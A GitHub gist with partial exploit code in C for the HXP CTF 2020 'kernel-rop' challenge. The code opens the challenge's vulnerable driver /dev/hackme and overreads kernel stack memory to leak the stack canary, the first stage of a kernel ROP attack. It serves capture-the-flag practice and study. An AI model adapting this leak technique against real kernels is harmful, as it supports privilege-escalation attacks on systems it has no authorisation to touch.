Skip to content

Instantly share code, notes, and snippets.

@brant-ruan
Last active September 2, 2022 09:30
Show Gist options
  • Save brant-ruan/a36de55493adafd8e9d78c1e2f660dad to your computer and use it in GitHub Desktop.
Save brant-ruan/a36de55493adafd8e9d78c1e2f660dad to your computer and use it in GitHub Desktop.
HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
int64_t global_fd = 0;
uint64_t cookie = 0;
uint8_t cookie_off = 16;
void open_dev() {
global_fd = open(VULN_DRV, O_RDWR);
if (global_fd < 0) {
printf("[-] failed to open %s\n", VULN_DRV);
exit(-1);
} else {
printf("[+] successfully opened %s\n", VULN_DRV);
}
}
void leak_cookie() {
uint8_t sz = 40;
uint64_t leak[sz];
printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
uint64_t data = read(global_fd, leak, sizeof(leak));
cookie = leak[cookie_off];
printf("[+] found stack canary: 0x%lx @ index %d\n", cookie, cookie_off);
if(!cookie) {
puts("[-] failed to leak stack canary!");
exit(-1);
}
}
int main(int argc, char **argv) {
open_dev();
leak_cookie();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment